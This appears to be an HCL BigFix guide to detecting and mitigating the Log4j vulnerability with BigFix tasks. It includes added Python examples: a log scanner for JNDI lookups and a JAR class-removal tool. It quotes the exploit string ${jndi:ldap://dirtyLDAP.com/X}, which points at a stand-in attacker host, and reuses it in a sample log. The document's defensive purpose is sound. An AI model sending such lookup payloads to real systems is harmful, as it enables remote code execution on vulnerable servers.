HCL BigFix Guide
for Countering the Log4J Vulnerability
Nearly every global enterprise or organization is facing pressure to fix what experts are calling one of the most serious software vulnerabilities in recent memory. It’s ubiquitous and easy to exploit.
The flaw in the Log4j software could allow hackers unfettered access to computer systems and has prompted an urgent warning by the U.S. government’s cybersecurity agency.
Attacks were observed less than a day after the vulnerability was reported. It currently holds a base score of 10 and has been labelled critical severity by the GitHub advisory.
What is it?
It is a vulnerability discovered in Apache Log4j, the popular Java logging library developed and maintained by the Apache Software Foundation. The Log4j library is widely used as the logging routine in many commercial and open-source software products. The vulnerability has a score of 10/10 in the MITRE.org common vulnerability scoring system (CVSS), indicating the highest severity.
How is it exploited?
Log4j can be exploited remotely by an unauthenticated adversary to achieve remote code execution (RCE). If an attacker sends a message that contains a string like ${jndi:ldap://dirtyLDAP.com/X}, the message lookup may load an external code class and execute malicious code WITHOUT authentication.
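A defender-side detection for the lookup string quoted above, run over constructed web-server access-log lines. This is an added example, not code from the page or from BigFix; it reports the client address plus the JNDI scheme and host of every line that carries a ${jndi:...} lookup, and ignores other lookups.

```python
import re

# Log4j 2 resolves "${<lookup>:<argument>}" inside any string it logs; the exploit string quoted
# on this page uses the "jndi" lookup with an ldap:// URL. The match is case-insensitive so that
# mixed-case spellings of the lookup name and scheme are reported as well.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

def find_jndi(line: str) -> dict:
    """Return {} for a clean line, else the JNDI scheme and host the lookup tries to reach."""
    m = JNDI_LOOKUP.search(line)
    return {"scheme": m.group(1).lower(), "host": m.group(2)} if m else {}

def scan_access_log(text: str) -> list:
    """Apply find_jndi to each Combined-Log-Format line; report (line_no, client_ip, scheme, host)."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        found = find_jndi(line)
        if found:
            client_ip = line.split(" ", 1)[0]  # first field of the Combined Log Format
            hits.append((no, client_ip, found["scheme"], found["host"]))
    return hits

# Constructed access-log sample (not from the page): line 2 carries the page's example string in
# the User-Agent field; line 3 shows that a non-JNDI lookup is not reported.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://dirtyLDAP.com/X}"
10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /api?q=${date:yyyy} HTTP/1.1" 200 10 "-" "curl/7.79.1"
"""

if __name__ == "__main__":
    for no, ip, scheme, host in scan_access_log(SAMPLE_LOG):
        print("line %d: JNDI lookup from %s -> %s://%s" % (no, ip, scheme, host))
```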
Who is impacted?
Hundreds of millions of devices are at risk including those in government, commercial and home computers. In addition, each affected device may have dozens or hundreds of places where the vulnerable code resides, as logging is an extremely common action in all of computing.
How can BigFix help?
The HCL BigFix team is working alongside our customers, security experts, and IT Operations to produce BigFix content to help you identify and fix the Log4j vulnerabilities in your environment.
BigFix is the essential tool for IT Operations. BigFix automates discovery, management, and remediation of all endpoints whether on-premises, mobile, virtual, or in the cloud – regardless of the operating system, location, or connectivity. With BigFix Insights for Vulnerability Remediation, which integrates with leading vulnerability management solutions like Tenable, vulnerabilities like Log4j can be remediated faster than any other solution in the market.
With BigFix you can discover, mitigate, and remediate vulnerabilities, create pre- and post-remediation reports, and protect remediated endpoints.
DISCOVERY
HCL BigFix has developed tasks to help BigFix users discover Log4J instances and vulnerabilities. We used the Logpresso Log4j scanner because it is an open-source, Java-based scanner developed by the Logpresso technical team and freely available to the cybersecurity community on GitHub.
These tasks download a temporary Java runtime to execute the scan and do not require Java to be installed on the system. They work on Windows 8.1 and higher (x86 and x64), Mac OS X, Linux (x86, x64, armv7l, ppc64, ppc64le, and s390x), AIX 7.1 TL4 and higher, and Solaris (x86 and SPARC). With a manual download of the JRE, the tasks can also execute on HP-UX.
The following four steps articulate the general process for discovering and reporting on the vulnerability:
1. From the "BES Inventory and License" Content Site, execute Task 602 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only".
2. From the "BES Inventory and License" Content Site, activate Analysis 601 "log4j2-scan results".
3. After scan results have been uploaded to the BigFix Server, view detailed scan results in the Analysis. See the image below.
4. For Executive Reporting, use the "Log4j Vulnerability Report (Logpresso Scan)" view provided in BigFix Web Reports.
MITIGATE
Prior to patches being made available from the application vendors, there are three ways to mitigate the Log4J risk:
1. Use the Logpresso Log4j-scan utility to remove vulnerable Java classes from the affected Log4j-core JAR files.
The Logpresso Log4j-scan utility can perform some remediations on affected Log4j-core JAR libraries, for both Log4j 2.x and Log4j 1.x. The utility mitigates the worst of the CVEs but may not mitigate all denial-of-service based vulnerabilities. Nonetheless, it can be a very effective step at providing protection while maintaining backward compatibility with existing applications. For details of the specific mitigations that can be performed by the tool, Contact Us.
HCL BigFix can execute a Logpresso Log4j-scan mitigation by taking action on Task 603 "Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION" from the "BES Inventory and License" Content Site. If this mitigation task causes any application compatibility issues, the original, unmodified versions of the Log4j-core files can be restored by executing Task 604 "Run: log4j2-scan v2.9.2 – Download JRE – UNDO REMEDIATION" from the "BES Inventory and License" Content Site.
After performing a Remediation or Undo Remediation scan, a follow-up Discovery scan should be executed to ensure the latest results are available for reporting.
2. Replace the log4j-core-2.x.jar file with the latest version.
3. Stop or disable the affected applications or services.
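The scan, class-removal mitigation and undo that the Discovery and Mitigate steps above drive through BigFix tasks, as an added Python illustration (not the Logpresso tool, BigFix content, or code from this page): it finds log4j-core JARs under a directory, reports their Maven version and whether the JNDI lookup class is present, rewrites a JAR without that class while keeping a .bak copy, and restores the original from the backup. Which classes Task 603 actually removes is not stated on this page; removing JndiLookup.class is the documented Log4j 2.x class-removal mitigation and is assumed here.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path

# Entry names inside log4j-core; deleting JndiLookup.class is the documented Log4j 2.x class-removal mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def inspect_jar(path: Path) -> dict:
    """DISCOVERY: {} if not log4j-core, else its Maven version and whether JndiLookup is present."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        if POM_PROPS not in names:
            return {}
        props = dict(l.split("=", 1) for l in zf.read(POM_PROPS).decode().splitlines() if "=" in l)
        return {"version": props.get("version", "unknown"), "jndi_present": JNDI_CLASS in names}
def scan_tree(root: Path) -> dict:  # every log4j-core JAR under root, keyed by relative path
    return {str(p.relative_to(root)): info for p in root.rglob("*.jar") if (info := inspect_jar(p))}
def remediate_jar(path: Path) -> bool:
    """MITIGATION: keep the unmodified JAR as <name>.bak and rewrite it without JndiLookup.class."""
    if not inspect_jar(path).get("jndi_present"):
        return False
    backup = path.parent / (path.name + ".bak")
    shutil.copy2(path, backup)
    with zipfile.ZipFile(backup) as src, zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as dst:
        for item in src.infolist():
            if item.filename != JNDI_CLASS:
                dst.writestr(item, src.read(item.filename))
    return True
def undo_remediation(path: Path) -> bool:
    """UNDO REMEDIATION: put the .bak original back in place (False if there is no backup)."""
    backup = path.parent / (path.name + ".bak")
    if not backup.exists():
        return False
    backup.replace(path)
    return True
def demo() -> dict:
    """Constructed stand-in for a vulnerable log4j-core JAR: scan, remediate, rescan, undo, rescan."""
    root = Path(tempfile.mkdtemp())
    jar = root / "app" / "lib" / "log4j-core-2.14.1.jar"
    jar.parent.mkdir(parents=True)
    with zipfile.ZipFile(jar, "w") as zf:  # 4-byte fake class body; only the entry names matter
        zf.writestr(POM_PROPS, "version=2.14.1\ngroupId=org.apache.logging.log4j\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    before = scan_tree(root)
    remediate_jar(jar)
    after = scan_tree(root)
    undo_remediation(jar)
    return {"before": before, "after": after, "restored": scan_tree(root)}
```

As on the page, a fresh discovery scan after remediation or undo is what confirms the current state; demo() returns all three scans so they can be compared.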
REMEDIATE
As vendors make patches available, BigFix will quickly create, test and deliver BigFix fixlets, available as in-product BigFix content downloads for entitled BigFix customers.
REPORT
With BigFix, reports of the affected systems and libraries can be viewed and archived using BigFix Web Reports that show vulnerability and mitigation status across different points in time.
PROTECT
Once the vulnerability has been remediated, BigFix can ensure it doesn’t reappear. With BigFix, you can schedule recurring scans using the available Detection Task so any new systems or software with the Log4J vulnerability can be identified and remediated.
If you need more assistance please contact Technical Support.
Try BigFix Today!
One endpoint management platform enabling IT Operations and Security teams to automate discovery, management and remediation – whether on-premises, virtual, or cloud – regardless of operating system, location or connectivity.